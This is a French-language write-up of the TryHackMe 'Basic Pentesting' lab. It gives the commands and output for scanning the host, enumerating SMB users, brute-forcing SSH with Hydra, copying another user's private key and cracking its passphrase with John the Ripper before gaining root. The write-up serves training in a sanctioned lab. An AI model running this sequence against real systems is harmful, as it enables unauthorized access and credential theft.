Basic Pentesting

Publié le 08 Février 2025 - Mis à jour le 18 Mars 2025
10 minutes de lecture
Tags: TryHackMe Facile Linux Énumération Samba Force brute John The Ripper

Lien vers l’épreuve : https://tryhackme.com/room/basicpentestingjt

Sommaire

Reconnaissance
Énumération du serveur web
Trouver les identifiants de connexion
Élévation de privilèges
Forcer le mot de passe de la clé

Reconnaissance

# Premier scan pour connaître les ports ouverts
nmap -T4 10.10.53.133

Afficher la réponse

Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-08 14:01 CET
Nmap scan report for 10.10.53.133
Host is up (0.053s latency).
Not shown: 994 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
8009/tcp open  ajp13
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 0.90 seconds

# Second scan pour davantage d'informations
nmap -T4 10.10.53.133 -p 22,80,139,445,8009,8080 -A

Afficher la réponse

Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-08 14:02 CET
Nmap scan report for 10.10.53.133
Host is up (0.035s latency).

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA)
|   256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA)
|_  256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (ED25519)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
| ajp-methods:
|_  Supported methods: GET HEAD POST OPTIONS
8080/tcp open  http        Apache Tomcat 9.0.7
|_http-title: Apache Tomcat/9.0.7
|_http-favicon: Apache Tomcat
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X
OS CPE: cpe:/o:linux:linux_kernel:4.4
OS details: Linux 4.4
Network Distance: 2 hops
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 1h40m04s, deviation: 2h53m13s, median: 4s
| smb2-time:
|   date: 2025-02-08T13:02:59
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: basic2
|   NetBIOS computer name: BASIC2\x00
|   Domain name: \x00
|   FQDN: basic2
|_  System time: 2025-02-08T08:02:59-05:00
|_nbstat: NetBIOS name: BASIC2, NetBIOS user: unknown, NetBIOS MAC: unknown (unknown)

TRACEROUTE (using port 443/tcp)
HOP RTT      ADDRESS
1   32.58 ms 10.11.0.1
2   33.31 ms 10.10.53.133

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.14 seconds

Énumération du serveur web

gobuster dir -u http://10.10.53.133/ -w /usr/share/wordlists/dirb/common.txt -r

Afficher la réponse

\===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
\===============================================================
[+] Url:                     http://10.10.53.133/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Follow Redirect:         true
[+] Timeout:                 10s
\===============================================================
Starting gobuster in directory enumeration mode
\===============================================================
/.hta                 (Status: 403) [Size: 291]
/.htaccess            (Status: 403) [Size: 296]
/.htpasswd            (Status: 403) [Size: 296]
/[...expurgé...]      (Status: 200) [Size: 1131]
/index.html           (Status: 200) [Size: 158]
/server-status        (Status: 403) [Size: 300]
Progress: 4614 / 4615 (99.98%)
\===============================================================
Finished
\===============================================================

Nous y trouvons des notes des développeurs :

2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat
to host that on this server too. Haven't made any real web apps yet, but I have tried that example
you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm 
using version 2.5.12, because other versions were giving me trouble. -K

2018-04-22: SMB has been configured. -K

2018-04-21: I got Apache set up. Will put in our content later. -J

Ainsi qu’une note à destination d’un utilisateur commençant par J qui semble avoir un mot de passe fragile.

For J:

I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials,
and I was able to crack your hash really easily. You know our password policy, so please follow
it? Change that password ASAP.

-K

Trouver les identifiants de connexion

Nous avons l’information qu’un service SMB est actif. Nous tentons d’obtenir davantage d’informations avec l’outil enum4linux

enum4linux -U -r 10.10.53.133

Afficher la réponse

WARNING: polenum.py is not in your path.  Check that package is installed and your PATH is sane.
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Feb  8 17:26:51 2025

 \========================== 
|    Target Information    |
 \========================== 
Target ........... 10.10.53.133
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 \==================================================== 
|    Enumerating Workgroup/Domain on 10.10.53.133    |
 \==================================================== 
[+] Got domain/workgroup name: WORKGROUP

 \===================================== 
|    Session Check on 10.10.53.133    |
 \===================================== 
[+] Server 10.10.53.133 allows sessions using username '', password ''

 \=========================================== 
|    Getting domain SID for 10.10.53.133    |
 \=========================================== 
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 \============================= 
|    Users on 10.10.53.133    |
 \============================= 
Use of uninitialized value $users in print at /root/Desktop/Tools/Miscellaneous/enum4linux.pl line 876.
Use of uninitialized value $users in pattern match (m//) at /root/Desktop/Tools/Miscellaneous/enum4linux.pl line 879.

Use of uninitialized value $users in print at /root/Desktop/Tools/Miscellaneous/enum4linux.pl line 892.
Use of uninitialized value $users in pattern match (m//) at /root/Desktop/Tools/Miscellaneous/enum4linux.pl line 894.

 \======================================================================= 
|    Users on 10.10.53.133 via RID cycling (RIDS: 500-550,1000-1050)    |
 \======================================================================= 
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-2853212168-2008227510-3551253869
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
[...expurgé pour brièveté...]
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\[...expurgé...] (Local User)
S-1-22-1-1001 Unix User\[...expurgé...] (Local User)

Nous lançons ensuite Hydra sur les services SSH pour trouver le mot de passe de l’utilisateur J.

hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.53.133

Afficher la réponse

Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-08 17:31:56
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking ssh://10.10.53.133:22/
[STATUS] 176.00 tries/min, 176 tries in 00:01h, 14344222 to do in 1358:22h, 16 active
[STATUS] 128.33 tries/min, 385 tries in 00:03h, 14344013 to do in 1862:52h, 16 active
[22][ssh] host: 10.10.53.133   login: [..expurgé...]   password: [..expurgé...]
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-08 17:38:28

Élévation de privilèges

Nous savons qu’il existe un autre utilisateur sur la machine. En navigant dans son dossier personnel, nous constatons que nous pouvons récupérer sa clé privée SSH. Cet utilisateur est d’autant plus intéressant qu’il fait partie du groupe sudo.

cd /home/[...expurgé...]/

ls -hAl
total 40K
[...expurgé pour brièveté...]
drwxr-xr-x 2 [...expurgé...]  [...expurgé...] 4.0K Apr 23  2018 .ssh
-rw-r--r-- 1 [...expurgé...]  [...expurgé...]    0 Apr 17  2018 .sudo_as_admin_successful
[...expurgé pour brièveté...]

cd .ssh/

ls -hAl
total 12K
-rw-rw-r-- 1 [...expurgé...] [...expurgé...]  771 Apr 23  2018 authorized_keys
-rw-r--r-- 1 [...expurgé...] [...expurgé...] 3.3K Apr 19  2018 id_rsa
-rw-r--r-- 1 [...expurgé...] [...expurgé...]  771 Apr 19  2018 id_rsa.pub

groups [...expurgé...]
[...expurgé...] : [...expurgé...] adm cdrom sudo dip plugdev lxd lpadmin sambashare

Nous récupérons la clé puis nous tentons de l’utiliser. Mais celle-ci est protégée par un mot de passe :

# Récupérer la clé sur notre machine
scp [...expurgé...]@10.10.53.133:/home/[...expurgé...]/.ssh/id_rsa ./
[...expurgé...]@10.10.53.133\'s password: 
id_rsa                                        100% 3326     1.9MB/s   00:00
# Vérifier la réception et les droits associés
ls -hl
total 4.0K
-rw-r--r-- 1 root root 3.3K Feb  8 17:56 id_rsa
# Appliquer les bons niveaux de droits pour la clé privée
chmod 600 id_rsa
# Tentative de connexion
ssh -i id_rsa [...expurgé...]@10.10.53.133
Enter passphrase for key 'id_rsa': 

Forcer le mot de passe de la clé

# Convertir le fichier en hash exploitable par John The Ripper
ssh2john id_rsa > hash.txt
# Craquer le hash
john --format=SSH hash.txt -w=/usr/share/wordlists/rockyou.txt

Afficher la réponse

Note: This format may emit false positives, so it will keep trying even after finding a
possible candidate.
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
[...expurgé...]          (id_rsa)
1g 0:00:00:10 DONE (2025-02-08 18:13) 0.09803g/s 1406Kp/s 1406Kc/s 1406KC/s *7¡Vamos!
Session completed.

ssh -i id_rsa kay@10.10.53.133
Enter passphrase for key 'id_rsa': 
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.


Last login: Mon Apr 23 16:04:07 2018 from 192.168.56.102

ls -hal
total 48K
[...expurgé pour brièveté...]
-rw------- 1 [...expurgé...]  [...expurgé...]    57 Apr 23  2018 pass.bak
[...expurgé pour brièveté...]

cat pass.bak 
here[...expurgé...]$$

Nous avons ainsi les accès root sur la machine, et nous trouvons un message du développeur de la box nous invitant à creuser encore plus pour trouver de nouveaux moyens d’exploration.

sudo su -
[sudo] password for [...expurgé...]:

id
uid=0(root) gid=0(root) groups=0(root)

ls -hl
total 4.0K
-rw-r--r-- 1 root root 1017 Apr 23  2018 flag.txt

cat flag.txt 

Afficher la réponse

Congratulations! You've completed this challenge. There are two ways (that I'm aware of) to gain 
a shell, and two ways to privesc. I encourage you to find them all!

If you're in the target audience (newcomers to pentesting), I hope you learned something. A few
takeaways from this challenge should be that every little bit of information you can find can be
valuable, but sometimes you'll need to find several different pieces of information and combine
them to make them useful. Enumeration is key! Also, sometimes it's not as easy as just finding
an obviously outdated, vulnerable service right away with a port scan (unlike the first entry
in this series). Usually you'll have to dig deeper to find things that aren't as obvious, and
therefore might've been overlooked by administrators.

Thanks for taking the time to solve this VM. If you choose to create a writeup, I hope you'll send 
me a link! I can be reached at josiah@vt.edu. If you've got questions or feedback, please reach
out to me.

Happy hacking!